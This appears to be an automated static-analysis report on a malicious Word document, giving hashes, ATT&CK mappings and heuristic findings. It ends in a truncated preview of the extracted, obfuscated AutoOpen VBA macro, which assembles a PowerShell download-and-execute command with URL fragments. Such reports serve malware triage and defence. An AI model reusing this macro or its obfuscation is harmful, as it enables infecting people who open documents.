Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4091856ed0c9d97a…

MALICIOUS

Office (OLE)

Size: 199.5 KB
Created: 2017-12-22 18:13:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04

MD5: 0821a83cb0a6b641f263cc4ac8b96623
SHA-1: e4be87a28aac3df92808c44e38797eb516eb99fa
SHA-256: 4091856ed0c9d97a3b8f1cf2123f8e2466418dc029522e1cd44d2b943d54a5d4

Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro that uses a Shell() call, indicating an attempt to execute arbitrary commands when the document is opened. This is a common technique for downloading and executing further malicious content. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports a dropper or phishing-lure role for the document.

Heuristics (8)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    A Shell() call is present in the VBA code.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    An AutoOpen macro is present and runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE document has large unaccounted-for region [high] (OLE_SLACK_ANOMALY)
    OLE file is 204,288 bytes but its declared streams total only 115,159 bytes; 89,129 bytes (44%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  18212 bytes
SHA-256: c52f4cec85f95281d01f0c7ae648a2e830394dbff72dc2e35509f70c2879455c
Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "IGVtNnN"
Sub AutoOpen()
On Error Resume Next
BmJXTGpDW = 871 / Rnd(4) + LVoUOkDb + OwHlIcRhkd * 9 + Int(WlWsJDOcwTzUbj * CStr(sFjHjvuSvQtA)) + uCYEaYn * CDate(3624 - 352183467 * 84 / 475) / wvKLWbdBQb - CSng(620)
jBakLwdtC = 871 / Rnd(4) + TbbQCMiwutu + wHtKYvN * 9 + Int(QRipNzaKqa * CStr(jVLGXTuIJtj)) + XhdESqB * CDate(3624 - 352183467 * 84 / 475) / hfiLCzmDDlX - CSng(620)
FUSNhlBWq = 871 / Rnd(4) + nEbjKGHjuIU + ztBnzEZjqFXVb * 9 + Int(FUwSRTKvubGb * CStr(qfTIdCQUZMtlw)) + JnijFIZBnncqAi * CDate(3624 - 352183467 * 84 / 475) / zZjYNjB - CSng(620)
WwtTKQfHD = 871 / Rnd(4) + UXAHLvBSSprj + nBlQamMNjNH * 9 + Int(lmmwIVfkv * CStr(diwnifGutK)) + QGRYAFVqTlJsq * CDate(3624 - 352183467 * 84 / 475) / IPUKTLwlRXH - CSng(620)
TnIhHoUza = 871 / Rnd(4) + fUZHPKtbkU + GMVPlkZwtfpt * 9 + Int(hSMIMwpvP * CStr(cuuCEBC)) + hDWNamRV * CDate(3624 - 352183467 * 84 / 475) / uwhpqbJ - CSng(620)
Application.Run "BJYBUhqczCNfwY", KLKDrCQ
azwlOnfpq = 871 / Rnd(4) + tVriVzqV + puUsZqrs * 9 + Int(wiPlSlcGDRvtYj * CStr(StwdVYBqUj)) + PGEYuXuktHsH * CDate(3624 - 352183467 * 84 / 475) / GGOuZZN - CSng(620)
RNzaftNXW = 871 / Rnd(4) + suChWVCiWYzonP + mtXPKHRvVT * 9 + Int(JitBJXO * CStr(PwEVkkMPDBOdah)) + szqHLna * CDate(3624 - 352183467 * 84 / 475) / jNUMXlVPcaozbh - CSng(620)
YmfzsNtHq = 871 / Rnd(4) + bdABSPCLowY + PXodhmlD * 9 + Int(iZLbEcOvMFZW * CStr(lulUwNYdKcJQWH)) + OjHVnosE * CDate(3624 - 352183467 * 84 / 475) / ZOmnQbtwlVlus - CSng(620)
NpYfIXwBK = 871 / Rnd(4) + UFjjwDjFtpwu + akMijLfBWOVS * 9 + Int(zIfUHnOjR * CStr(jvuuCQsEwSGz)) + vpNqfjwqKNjGbZ * CDate(3624 - 352183467 * 84 / 475) / hIfBJBdnoQ - CSng(620)
dkdKZALzN = 871 / Rnd(4) + fuzjATsYhOoa + TXnmFotSBYaCv * 9 + Int(flNVHNptmK * CStr(ApIEGZbCsKnlNF)) + URiWXjEz * CDate(3624 - 352183467 * 84 / 475) / nTthNBak - CSng(620)
End Sub
Function KLKDrCQ()
On Error Resume Next
VvNMEEdkI = 871 / Rnd(4) + wfnkGwkIlsjpCH + bTIdvdkASqXEwK * 9 + Int(MODZlrwtmhj * CStr(tzvKzmXM)) + GiwVOfVuitl * CDate(3624 - 352183467 * 84 / 475) / JfVldWGdZVwOSq - CSng(620)
zuwzA = 871 / Rnd(4) + FZcUaoKqkd + qCtPVDuOXlaj * 9 + Int(DHITKkasVNwBJM * CStr(PrwqawTwXbavXk)) + misfQSfrfA * CDate(3624 - 352183467 * 84 / 475) / uVovOMr - CSng(620)
dvTYaXc = Mid("mujGr85E872FEX'a.t7EV+7EVk/U7EV+7EVbsnq'+'7'+'EV+7EVt/'+',http:/7EV+Fn4+Fn47EV/w7EV+7EVw7EV+7EVw.cola-i7EV+7EVnfo.7EV+7'+'EVnl/Ts7EV+7EVZ7EV+7EVF2FNtRJ", 15, 131)
UXZfwNKSibv = 871 / Rnd(4) + WjXSbzz + fHDXMcz * 9 + Int(nuMkTaY * CStr(QQjClmhDXd)) + OKbKBJZpiawtAZ * CDate(3624 - 352183467 * 84 / 475) / ITGGhwHCB - CSng(620)
bUCCvIUuhz = 871 / Rnd(4) + XOonoUSNMowh + BkHqsBpNJrE * 9 + Int(uXPWuJmKAXSz * CStr(YlSZRjDjjC)) + jlmjwVOXkEuzCq * CDate(3624 - 352183467 * 84 / 475) / fKXidRIRT - CSng(620)
RnZcYT = 871 / Rnd(4) + NzUsZAzj + ltLjLatktvR * 9 + Int(jcUiOwQvCG * CStr(ZAnMFzFa)) + KWoXwjvjoLNGkm * CDate(3624 - 352183467 * 84 / 475) / UAOLDjncilm - CSng(620)
LIIwFOkCQf = Mid("G2Wr5jchAR]39) |.( $psHoMe[21]+$PShome[30]UzqiQ9GKHwD1qoRpijfkJPlc", 7, 36)
iohZImz = 871 / Rnd(4) + WnrKBCNUQ + IXCNiJvPUioPj * 9 + Int(BsIBYhXUSTahWM * CStr(BjcmzKIIKzTW)) + zpbHEsJItMwjS * CDate(3624 - 352183467 * 84 / 475) / EjnzmijSzLdjo - CSng(620)
BWoHCkadP = 871 / Rnd(4) + hCjYJGVQkDR + ZMTLTDWasPfK * 9 + Int(rEzSpzJPPdZP * CStr(MLWTrmroOotwWa)) + dhSWYqSBXw * CDate(3624 - 352183467 * 84 / 475) / FHWKjtvUqLEZXt - CSng(620)
GQaCuRZF = 871 / Rnd(4) + kwBFKiWcsSdiD + IUjChVDYWC * 9 + Int(oMfsPdUEPYvK * CStr(ZoRcrUTIiGKcf)) + CSqLczXVRrj * CDate(3624 - 352183467 * 84 / 475) / pJZnBMKpdsD - CSng(620)
OYjPztlQWdm = Mid("thwm7GYKVEMzFnh,Fn4resFn4).ReplAce(([ChAr]'+'52+[ChAr]7'+'0+[ChAr]89),Fn4SfhFn4))')  -rePLACE  'res',[chAR]124-rePLACE  ([chAR]83+[chAR]102+[chAR]104),[chAR]36-CrEplAcE  'Fn4',[VzmCXKb0v0", 16, 162)
hdkwI = 871 / Rnd(4) + tdQDTTWom + KCqItKwVvjjS * 9 + Int(FADBjKY * CStr(vdFwpkUi)) + iTkcYqEMzBG * CDate(3624 - 352183467 * 84 / 475) / bNkbZLD - CSng(620)
qjBnVbLY = 871 / Rnd(4) + NcJCYLXYsiothq + KBAbSvXwitWbi * 9 + Int(JDJEcOlw * CStr(wiaGBnnIm)) + ilHPPWD * CDate(3624 - 352183467 * 84 / 475) / fbICkpLibioEc - CSng(620)
jd
... (truncated)